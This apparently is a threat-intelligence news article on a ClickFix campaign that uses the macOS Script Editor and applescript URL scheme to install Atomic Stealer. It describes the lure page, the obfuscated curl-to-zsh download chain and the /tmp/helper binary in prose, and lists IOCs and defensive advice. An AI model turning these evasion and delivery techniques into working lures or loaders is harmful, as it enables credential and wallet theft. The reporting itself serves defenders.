A sophisticated new ClickFix campaign is bypassing macOS Terminal security by exploiting the built-in Script Editor application to deliver the potent Atomic Stealer malware. This tactic represents a significant evolution in how threat actors adapt to Apple’s escalating security measures, underscoring that social engineering remains a formidable pathway to compromise.
Previously, ClickFix attacks relied on users pasting malicious commands directly into Terminal. However, Apple’s recent security enhancements in macOS 26.4 introduced a scanner for Terminal commands, making this method less effective. Attackers have now pivoted to Script Editor, a legitimate macOS tool, demonstrating their agility in finding alternative routes for malware delivery.
New ClickFix Campaign Leverages Script Editor for Atomic Stealer Deployment
Researchers at Jamf Threat Labs identified this novel attack vector, which utilizes the `applescript` URL scheme. This allows malicious websites to directly invoke Script Editor from a web browser, effectively sidestepping the newly implemented Terminal protections without raising immediate alarms.
The campaign initiates with a deceptive Apple-themed webpage designed to mimic a legitimate disk space cleanup utility. The website provides step-by-step instructions that appear to be standard macOS maintenance procedures, aiming to build user trust and encourage interaction.
When a user clicks an “Execute” button on the fraudulent webpage, the browser silently triggers the `applescript` URL scheme. A security permission dialog then prompts the user to open Script Editor, a step that can easily be mistaken for a routine system operation.
Upon opening, Script Editor presents a pre-written script pre-populated with code. This script often includes fake copyright headers, styling itself as an official Apple storage optimization tool to enhance its credibility and lull users into a false sense of security.
The user experience differs slightly depending on the macOS version. While older versions might proceed directly to execution, macOS 26.4 requires users to explicitly approve saving the script to disk before it can run, adding an extra layer of user consent.
Once the user executes the deceptive script, the malicious chain of events unfolds. The embedded commands employ obfuscation techniques, using the `tr` utility to transform a scrambled string into a functional URL at runtime. This URL then leverages `curl` with the `-k` flag, disabling TLS certificate validation, which allows the malware to connect to potentially untrusted infrastructure without triggering security warnings.
The downloaded payload is then piped directly into `zsh` and executed entirely in memory, leaving no trace on the disk during this initial phase. The first-stage payload is further concealed using base64 encoding and gzip compression. Upon decoding, it retrieves a Mach-O binary, which is saved to the `/tmp/helper` directory. This binary’s extended attributes are stripped, execution permissions are assigned, and it is then launched.
Atomic Stealer: The Primary Infostealer Payload
The binary in question is a recent variant of Atomic Stealer, a notorious infostealer specifically designed for macOS. This malware is known to exfiltrate sensitive data including browser credentials, saved passwords, cryptocurrency wallet information, and other critical data from compromised systems.
The confirmed indicators of compromise (IOCs) associated with this campaign include the domain `dryvecar.com`. Additionally, `storage-fixes.squarespace.com` and `cleanupmac.mssg.me` have been identified as hosting the deceptive ClickFix webpages used in this attack.
The Mach-O binary, masquerading as `helper` in the `/tmp` directory, has a SHA-256 hash of `3d3c91ee762668c85b74859e4d09a2adfd34841694493b82659fda77fe0c2c44`. macOS users are strongly advised to exercise extreme caution and refrain from executing any scripts prompted by external webpages, irrespective of any official branding they might display. It is crucial to decline any requests from browsers to open Script Editor or other automation tools from unknown sources.
Maintaining macOS with the latest updates is paramount, as it ensures that the most recent built-in security features are active and equipped to defend against evolving threats like this new ClickFix campaign. The ongoing evasion tactics employed by attackers highlight the continuous need for vigilance and proactive security practices among macOS users.